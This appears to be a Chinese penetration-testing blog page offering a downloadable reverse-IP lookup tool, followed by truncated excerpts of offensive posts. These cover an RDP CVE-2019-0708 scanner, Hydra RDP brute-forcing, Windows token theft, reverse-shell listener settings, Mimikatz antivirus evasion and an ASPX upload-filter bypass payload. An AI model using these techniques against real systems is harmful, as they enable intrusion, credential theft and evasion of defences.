旁站查询工具下载
1664 1
前言:现在旁站查询的接口越来越少了,好不容易找到一个速度还算不错的接口,所以写了个工具。软件截图软件信息文件名称: 旁站查询工具.exe文件大小: 390 KB (399,360 字节)文件版本: 1.0.0.0修改时间: 2019年06月17日,16:42:45MD5: 9F29DF7B1017A56666229BA58E6E47B4下载地址蓝奏云盘https://www.lanzous.com/i4lqv4b
The Lastest
CVE-2019-0708漏洞检测工具
2366 3
前言git上已经有很多检测脚本了,但是GUI的目前没看到,所以就抽空写了一个。软件采用了360官方发布的检测程序,我在该程序上进行了改进。更新说明更新时间:2019-06-08版本号:v1.1.0更新内容:修复扫描成功的总数错误问题软件截图使用说明自己整理好要扫描的ip,一行一个ip。如下;192.168.1.1:3389 或者 192.168.1.1就行导入软件开始扫描就行了。使用ip段扫描的话,建议扫c段就行了,否则生成大量i...
kali下Hydra爆破RDP服务器
901 0
前言hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的。在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器。hydra还支持GUI图形界面(xhydra),不过习惯还是命令好用。帮助命令:hydra -h //查看基本用法 参数说明:hydra [[[-l login|-L file] [-p PASS|-P FILE]] | [-C FILE]] [-...
Token获取与利用
1420 0
0x01 简介本文将要介绍以下内容;·Token简介·Metasploit中的incognito·Windows平台下的incognito·Invoke-TokenManipulation.ps1用法·利用token获得system权限·利用token获得TrustedInstaller权限0x02 Token简介Windows有两种类型的Token:·Delegation token(授权令牌):用于交互会话登录(例如本地用户直...
powershell反弹shell的几种方法
3932 0
0x00 nc反弹如果想接收多个sessions的话,用msf执行以下命令监听。反弹成功以后,用sessions id 来选择要操作的目标。msfconsole use exploit/multi/handler set payload windows/shell/reverse_tcp set lhost 192.168.1.33 set lport 888 run -j #如果只接收一个sessions的话,直接执行以下命令...
九种姿势运行Mimikatz
2309 0
前言平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。下载最新版360:未经处理的mimikatz直接就被杀了下面开始进行绕过360抓密码姿势一-powershellhttps://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1cmd下执行C:\Users\test\De...
某aspx程序上传过滤绕过
1092 0
测试直接上传aspx的话,会提醒非法后辍名。修改成jpg可以上传修改x.jpg.aspx能上传,但是后辍名会去掉payloadx.jpg.aspx.asPX.Aspx 原因:在第二个后辍名的时候强制删除以后,没有继续处理后面的后辍,导致绕过。上传后的文件大概如下:x.jpg.aspx.asPX.ASpx201903031010.Aspx